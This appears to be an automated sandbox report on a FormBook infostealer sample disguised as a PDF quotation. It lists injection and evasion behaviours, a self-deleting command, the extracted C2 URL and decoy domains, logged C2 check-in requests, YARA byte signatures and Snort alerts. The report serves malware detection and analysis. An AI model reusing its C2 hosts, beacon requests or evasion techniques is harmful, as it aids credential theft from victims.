Windows Analysis Report: Solicitud urgente de Quotaion_U1197,pdf.exe

Overview

General Information

Sample Name: Solicitud urgente de Quotaion_U1197,pdf.exe
Analysis ID: 532838
MD5: 985db7fdfcf2aa38a0b75c22f06b2756
SHA1: 5f51dec30f3a649fc49e95e3421bc247cf9c40c7
SHA256: 6e4323460316f29ecdaa2b49fbe733c11ea3a040cf7336e177ac9345ddac21c1
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
.NET source code contains potential unpacker
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • Solicitud urgente de Quotaion_U1197,pdf.exe (PID: 6204 cmdline: "C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe" MD5: 985DB7FDFCF2AA38A0B75C22F06B2756)
    • Solicitud urgente de Quotaion_U1197,pdf.exe (PID: 6120 cmdline: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe MD5: 985DB7FDFCF2AA38A0B75C22F06B2756)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msdt.exe (PID: 6516 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
          • cmd.exe (PID: 6960 cmdline: /c del "C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.coralxlix.com/c1h5/"], "decoy": ["ui4dev.com", "horrycountyrealtor.com", "abivz.icu", "toxicwokeness.com", "fillthegap.site", "surprisessinside.com", "metaversefinder.xyz", "freeshipflowers.com", "apacheicon.com", "greenfootprintpros.com", "topauonlinecasino.com", "weqffg.site", "bountylux.com", "eedrvheyn.sbs", "whiskeybentmobile.com", "yupeg.xyz", "thenorthwesthome.com", "cyril.ventures", "zukunsmart.com", "1l7kng51j4nm.site", "nigeldavies.net", "8sscal.icu", "8wngeu.icu", "paramountnewtwork.com", "homehelperscalifornia.com", "tropicalbooking.com", "samsungwr.com", "gravityarchive.com", "hatdieuhoanglinhlinh.com", "masterysystemsinternational.com", "handandstoneparma.com", "tucsongolfacademy.com", "wholesalepoolkits.com", "2lovit.com", "calista-platinum.com", "dark9a.com", "sextremeboudoir.com", "dalmonello.com", "gyqfnc.com", "wqbz1.com", "kentuckyductless.com", "automotive-forensic.com", "metacityelves.com", "yckzy.com", "therobotians.com", "38qp2.com", "xqibit.site", "xn--o39a00am61aa311e3tj68d.com", "theb8szsk5vkv.com", "blackfridaypromoamericanas5.com", "4746390.win", "binkybones.com", "bridalhuich.com", "marceanahata.com", "kostense.email", "wellingboroughbid.com", "afxwn.icu", "nofrdictrack.com", "smohjs.com", "yjefcalg1p.top", "haseeb-wp.site", "analytics-at-scale.com", "adqc3.icu", "berekende.ink"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000006.00000000.298321821.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000006.00000000.298321821.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000000.298321821.0000000000400000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18849:$sqlite3step: 68 34 1C 7B E1
  • 0x1895c:$sqlite3step: 68 34 1C 7B E1
  • 0x18878:$sqlite3text: 68 38 2A 90 C5
  • 0x1899d:$sqlite3text: 68 38 2A 90 C5
  • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
0000000A.00000002.560174409.0000000000770000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000A.00000002.560174409.0000000000770000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(31 entries in total; the remainder are not shown here)

Unpacked PEs

Source | Rule | Description | Author | Strings
6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.8.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.8.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.8.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18849:$sqlite3step: 68 34 1C 7B E1
  • 0x1895c:$sqlite3step: 68 34 1C 7B E1
  • 0x18878:$sqlite3text: 68 38 2A 90 C5
  • 0x1899d:$sqlite3text: 68 38 2A 90 C5
  • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.6.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.6.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(17 entries in total; the remainder are not shown here)

Sigma Overview

System Summary:

Sigma detected: Possible Applocker Bypass
Source: Process started, Author: juju4, Data: Command: C:\Windows\SysWOW64\msdt.exe, CommandLine: C:\Windows\SysWOW64\msdt.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\msdt.exe, NewProcessName: C:\Windows\SysWOW64\msdt.exe, OriginalFileName: C:\Windows\SysWOW64\msdt.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3352, ProcessCommandLine: C:\Windows\SysWOW64\msdt.exe, ProcessId: 6516

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000006.00000000.298321821.0000000000400000.00000040.00000001.sdmp, Malware Configuration Extractor: FormBook (the extracted configuration is listed in full under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: Solicitud urgente de Quotaion_U1197,pdf.exe, Virustotal: Detection: 40%
Yara detected FormBook
Source: Yara match, File source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.2.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.2.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000006.00000000.298321821.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000A.00000002.560174409.0000000000770000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.372897742.0000000001730000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000000.298732907.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000000.338321770.00000000100B5000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.372402095.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000A.00000002.563987618.00000000007C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000000.354531059.00000000100B5000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.373637862.0000000001A90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000A.00000002.558246949.0000000000120000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.301296785.0000000004309000.00000004.00000001.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://www.weqffg.site/c1h5/?2do4nxu0=xDzgA/AT2jMmjnlrkj7rt3ckDtoX4QGQrpVL2KD3Bff+aUtt+S7+kl+hKb5L2UO+/CvD&q4Y4=kvWdz, Avira URL Cloud: Label: phishing
Source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.6.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.4.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.8.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.2.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: Solicitud urgente de Quotaion_U1197,pdf.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: Solicitud urgente de Quotaion_U1197,pdf.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: msdt.pdbGCTL source: Solicitud urgente de Quotaion_U1197,pdf.exe, 00000006.00000002.374490379.0000000003680000.00000040.00020000.sdmp, Solicitud urgente de Quotaion_U1197,pdf.exe, 00000006.00000003.365732847.0000000003680000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: Solicitud urgente de Quotaion_U1197,pdf.exe, 00000006.00000002.372947461.0000000001760000.00000040.00000001.sdmp, Solicitud urgente de Quotaion_U1197,pdf.exe, 00000006.00000002.373171059.000000000187F000.00000040.00000001.sdmp, msdt.exe, 0000000A.00000002.568927904.00000000046FF000.00000040.00000001.sdmp, msdt.exe, 0000000A.00000002.568800270.00000000045E0000.00000040.00000001.sdmp, msdt.exe, 0000000A.00000003.372669343.0000000000BA0000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: Solicitud urgente de Quotaion_U1197,pdf.exe, 00000006.00000002.372947461.0000000001760000.00000040.00000001.sdmp, Solicitud urgente de Quotaion_U1197,pdf.exe, 00000006.00000002.373171059.000000000187F000.00000040.00000001.sdmp, msdt.exe, msdt.exe, 0000000A.00000002.568927904.00000000046FF000.00000040.00000001.sdmp, msdt.exe, 0000000A.00000002.568800270.00000000045E0000.00000040.00000001.sdmp, msdt.exe, 0000000A.00000003.372669343.0000000000BA0000.00000004.00000001.sdmp
Source: Binary string: msdt.pdb source: Solicitud urgente de Quotaion_U1197,pdf.exe, 00000006.00000002.374490379.0000000003680000.00000040.00020000.sdmp, Solicitud urgente de Quotaion_U1197,pdf.exe, 00000006.00000003.365732847.0000000003680000.00000004.00000001.sdmp

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49872 -> 192.0.78.24:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49872 -> 192.0.78.24:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49872 -> 192.0.78.24:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe, Domain query: www.afxwn.icu
Source: C:\Windows\explorer.exe, Domain query: www.weqffg.site
Source: C:\Windows\explorer.exe, Network Connect: 156.234.12.248 80
Source: C:\Windows\explorer.exe, Network Connect: 192.0.78.24 80
Source: C:\Windows\explorer.exe, Domain query: www.analytics-at-scale.com
Source: C:\Windows\explorer.exe, Network Connect: 162.214.233.244 80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: www.coralxlix.com/c1h5/
Source: Joe Sandbox View, ASN Name: AUTOMATTICUS AUTOMATTICUS
Source: Joe Sandbox View, ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
Source: global traffic, HTTP traffic detected: GET /c1h5/?2do4nxu0=xDzgA/AT2jMmjnlrkj7rt3ckDtoX4QGQrpVL2KD3Bff+aUtt+S7+kl+hKb5L2UO+/CvD&q4Y4=kvWdz HTTP/1.1 Host: www.weqffg.site Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic, HTTP traffic detected: GET /c1h5/?2do4nxu0=dDVdw41TThH+tglXdiSPLe9aGuOwvr9FdRXdYLI3Qef1kwVllG2roDseQXIwgkVkVQDX&q4Y4=kvWdz HTTP/1.1 Host: www.afxwn.icu Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic, HTTP traffic detected: GET /c1h5/?2do4nxu0=eCqut3pLTAp695DvAk1SvvQ7mDNC6PWTA4g6LTP2Tz9bKaOndJvYlqsLJ7dAZrG7pLSW&q4Y4=kvWdz HTTP/1.1 Host: www.analytics-at-scale.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View, IP Address: 192.0.78.24 192.0.78.24
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Thu, 02 Dec 2021 17:39:27 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic, HTTP traffic detected: HTTP/1.1 403 Forbidden Server: nginx Date: Thu, 02 Dec 2021 17:39:50 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Source: msdt.exe, 0000000A.00000002.569235088.0000000004FFF000.00000004.00020000.sdmp, String found in binary or memory: https://www.analytics-at-scale.com/c1h5/?2do4nxu0=eCqut3pLTAp695DvAk1SvvQ7mDNC6PWTA4g6LTP2Tz9bKaOndJ
Source: unknown, DNS traffic detected: queries for: www.weqffg.site

E-Banking Fraud:

Yara detected FormBook
Source: Yara match, File source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.2.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.2.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000006.00000000.298321821.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000A.00000002.560174409.0000000000770000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.372897742.0000000001730000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000000.298732907.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000000.338321770.00000000100B5000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.372402095.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000A.00000002.563987618.00000000007C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000000.354531059.00000000100B5000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.373637862.0000000001A90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000A.00000002.558246949.0000000000120000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.301296785.0000000004309000.00000004.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 6.2.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 6.2.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.298321821.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.298321821.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.560174409.0000000000770000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.560174409.0000000000770000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.372897742.0000000001730000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.372897742.0000000001730000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.298732907.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.298732907.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.338321770.00000000100B5000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.338321770.00000000100B5000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.372402095.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.372402095.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.563987618.00000000007C0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.563987618.00000000007C0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.354531059.00000000100B5000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.354531059.00000000100B5000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.373637862.0000000001A90000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.373637862.0000000001A90000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.558246949.0000000000120000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.558246949.0000000000120000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.301296785.0000000004309000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.301296785.0000000004309000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: Solicitud urgente de Quotaion_U1197,pdf.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
